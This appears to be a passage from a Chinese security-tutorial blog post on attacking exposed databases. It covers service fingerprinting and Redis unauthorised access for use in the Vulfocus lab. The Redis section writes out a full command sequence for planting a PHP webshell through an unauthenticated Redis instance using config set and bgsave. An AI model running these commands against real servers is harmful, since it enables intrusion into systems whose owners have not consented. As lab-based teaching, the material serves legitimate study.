数据库安全&Redis&CouchDB&H2database&未授权访问&CVE 漏洞

前置知识:

1 、复现环境: Vulfocus( 官方在线的无法使用 )
官方手册: https://fofapro.github.io/vulfocus/#/
搭建踩坑:(无法同步)
https://blog.csdn.net/m0_64563956/article/details/131229046
2 、服务判断 :
端口扫描:利用服务开启后目标端口开放判断
组合判断:利用搭建常见组合分析可能开放服务
信息来源:访问端口提示软件版本,应用信息等
强弱特征:如框架 shiro 强特征 rememberMe,SpringBoot 默认页面等
3 、对象类别 :
对服务进行类别划分,通过服务功能理解,如数据库有帐号密码就有爆破利用方法,也可
以针对服务公开的 CVE 进行漏洞测试及服务常见的错误安全配置导致的未授权访问等。
4 、利用方法 :
主要集中在 CVE 漏洞,未授权访问,弱口令爆破等

数据库应用 -Redis- 未授权访问 &CVE 漏洞

默认端口: 6379
Redis 是一套开源的使用 ANSI C 编写、支持网络、可基于内存亦可持久化的日志型、
键值存储数据库,并提供多种语言的 API 。 Redis 如果在没有开启认证的情况下,可以
导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数
据。
1 、未授权访问: CNVD-2015-07557

  • 写 Webshell 需得到 Web 路径
    利用条件: Web 目录权限可读写
    config set dir /tmp # 设置 WEB 写入目录
    config set dbfilename 1.php # 设置写入文件名
    set test "<?php phpinfo();?>" # 设置写入文件代码
    bgsave # 保存执行
    save # 保存执行
    注意:部分没目录权限读写权限









相关推荐
星期天要睡觉34 分钟前
MySQL 综合练习
数据库·mysql
Y40900139 分钟前
数据库基础知识——聚合函数、分组查询
android·数据库
JosieBook2 小时前
【数据库】MySQL 数据库创建存储过程及使用场景详解
数据库·mysql
处女座_三月2 小时前
改 TDengine 数据库的时间写入限制
数据库·sql·mysql
酷ku的森2 小时前
Redis中的hash数据类型
数据库·redis·哈希算法
Arva .2 小时前
Redis
数据库·redis·缓存
DemonAvenger2 小时前
MySQL与应用程序的高效交互模式:从基础到实战的最佳实践
数据库·mysql·性能优化
博一波2 小时前
Redis 集群:连锁银行的 “多网点智能协作系统”
数据库·redis·缓存